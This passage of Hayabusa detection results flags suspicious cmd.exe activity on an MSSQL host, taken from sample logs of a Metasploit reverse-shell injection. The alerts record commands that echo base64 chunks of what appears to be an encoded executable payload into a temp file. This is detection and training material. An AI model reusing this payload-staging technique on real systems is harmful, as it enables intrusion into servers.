0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:12.191 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:12.463 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
FNVAAFD/FYDBQAChiwJBe4PECIXAx0X0PgBUABn/BQEAITP2ochoQQCLTAYEixRmUY2FRPv//1JQ6FFhAACLPcgLQQBqAGjawf4Ai0w+HItU9hB0RD4GiR/ci84+TLFcNu6JVcCLVD4MgcH0AQDFidfUg9KTYmTo0oXGIYtN3OhQ4MMFcAEAEi0Ag9EAaOgDMABRUOgQhQAAUotV1E2LRdAr2PhF3BvCgcP0igAAg3UAagBo6AMAAFBT6ECFSQCLTdRS9ItF0AX0xvoA1wBwOgCW6AMAAFFQ6NyFAABSi9M+BFCLBHDqAGhAdA8xUlDoC4UARVIDVfyN2ET/x/9Qzmjw1F8AUkgVgMFAjItFuoPEuUCLDawCQQBvxrs7PYlF9A+M/f7//4tF/FD/FVDBQAAZxASLRcWFwJcIasL/FcydQO1fXluL5V3Ds5CQkJBVi9uLRQiLTRZWi1AQi3EQi0AUi0kUO8F/0HwEO9ZzBoPI/17WwzvBfA5/BDvWdgizKwAAAF7RwzPAXl3DkJCQVYvsi0UIi02uVqFQGM9uGItAHItJHDvBfxZ8BDuSAwbLIv8OicM7wXwOXVI7PZIIuAEAAABeXcozwF5dw3KQkFWLootNBlO3V5txGIt5TItB7SNRFAL3G5HtOAyLehiLShCoIBQr+YtKHNDLO05/GHwEO/dzCBNIg8j2W13DO6x8EH8EO/cvCu5euAGpHgCtXcNfXjPAW13DkJCQkJCQ4VVuuotFCItNDFteUAiLcRWT+gyLSQw7eX8WfAQ71nMGg8idXl3DO8FZDn8EpdZ2CLgLAL4AXl3D3sBeXcMSkJBVi+yDHsxLlwtBAIsNpAtBADX0F8ALQQBWV4s9xCJBACvDG8+LFejXQQCJRciJ98zfbcjoNWSbQIBSaGnngADcDTjCQHPdXc3/1gTwFyldwODxQQBQUqHCC0oAUGig50AAkdZ5DQsEQQCh8BdBAIsVqAtKAFFQUFJoUOdaDP/Wiw2oC0EAM8BmofTUQQDXoUOFQQBrUBRoAOdAAP9eixUSxEEMo/AXQQB9xERSUFChc2ZBAFBosOZAAP/WvA2MAkEAofAVQWCLzKgLQQBRUFDmRljmQAD/1qEY0EAAiw2oC0GVUKHwF84AUD9RaAjmQAD/1otVzItxyApQobgX7gBYk4sNqAtBAL2vqIdAAH3Wi5qsMkEAoVEXQQCDh1TWUBehqNNB3lAhWOVAAPnWAuu4AkEAU/A1QQCLFagLQQBRUFBSaLflQAD/HKG4kkGGg8S6hcB0K6HMTQQAiw3AAm8AixXEAkEAUKHwQkEAXItGqAtBAFJQUWiwakAA/9aDxG2h0AJBi4XAdBmLFeHJQQCN1/AXQQBQUFJoYORhAP+juAkUoWKvQQCFwHQeobACQQCLDagLQT5QsqCcQQBQUFFo7uRAAMbWkjwUtfaUAkEAzpACQQCuaqgLQQBSUKHwQzQAElA3>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:12.737 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.010 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.286 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.560 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AaO0AogAdQuLSxCJDbUCQQBXQotTEGKMAkG2O9B0SIsNudpBAKHAAkEAQUCJDa/jQQAVwAJBAKEwAkEAi68Q0LEAO8EPjRMBcgCLDcgLWQCLucPmBQPxiyawAkEAQPujrERBmYkN+wKPN+i0KAAAiehiCAAAi4MwCAAAiZNUCAAA3QaLizQIAACJTgSjizgIAACbgzAIAABvZDQIAAAryIuDPAgAMxvCO8d/CnwEV89z0TPJM8CJDxDlRhSLi1AIAGNogzAIhACLkzRecQDq+otRKw/JRxvCO8eiCnwEO89Q+zPJ2cBfThiJqhyLtUgIAABug28IAACLk38NQQAryIuDTAg2ALfC5McYCnxBO89zBAbJM8+JTgiJRgyLDRTjQAA7z3Q3iw6sAkEFHEmZ9/nK0rYoixXIwEAAVoPC0wlA6EAAUv+fgMFAAEHIwEAAg8BAUP8VVOBRmYMvT4m7JAgAAIlhHIm7KG8AZom7IAgAAImMEGBXA+i/JwAAo6ALQQCJFaQL0bSJg2UIAACLDaQLQQCsYzwIAAB2FaALQZmJkzAIUQChpAtB1VOJgzTAAADoDG3//8/EBF9xW4vlXcOQkOiIArUAVto3ZMFAAIXAdSZo2OpAAKa06rMAgNZoaOpAAD3WaCC1wgD/1miAB0AA/9aDxBRew2gU6n0A/85oAOpAAM9E1EDsaMjpQADH1mh46UB+x9ZoyOlAALXW+BzpQAv/+4OGHF7ukLmQkJCQkJBVi++LRRyLDcgDQABWizWAQ0AAUOzBCGhk8g4AUZHWi4ySwC0AFz3y3IeDwkBS/5yhyMCJANYg8mwzg8BAUP/Wiw3IwEAAaOTxQCKDwUBR/9aLFciWQgBorPFAAIPC6VL/1qHIwEAAaLLxQACDwEBQ/zSLDQLAzABoIPFAAIPBQFH/1osKyJ5AiWi3mUCag8JAUv/WocLAQACDxESDwED9lAZAAFD/1osNyNZAtWjy8ECxg8FAUSjWixXIwEAA8yjwQACDwkBS/9ahyCpAu5js70AAg8BAUP/Wiw3IwEAAaLTvPwCDwUBR/9aLt8jAQABohO8DboPCgFL/1vnIwEB1aEhoQACDqUBQ/9ZoEIkAAIsN68BAq5TBQFHF1osVvbVJc4PEQIPCSWjQ7kAAUv/JocjAHwBoiO5AAIPAQFD/WYsNyMBAAF9A0UAAg8FAUf/Wi6vIwEAAaPA5QACDwv/x/9ahyO3xAMeo50AAosBAuP93iw1dwFoAaGDtQACfwUBRPtaLKsPAQAB+GO3FAIPCP1L/1gnIwBAAaGDtQACDwEBQ2dYfDcjhjACDxOCDwUBo4OxAAFGC1ov0yMBAwmjm6kAAg8JAZ//WocgmQK5ofMOiwoPAQFD/1osXyMBAAGhA7ECBZsFAUf/WixXIwEDgaPjr/gCDwhxS/9ahyMBA92iwUkAAg8BAUP/W2w2kwEAAp3DrQHODwVJR/9WLFcjA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.833 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.106 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 
07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.295 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+FjAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 
07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 
| LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9t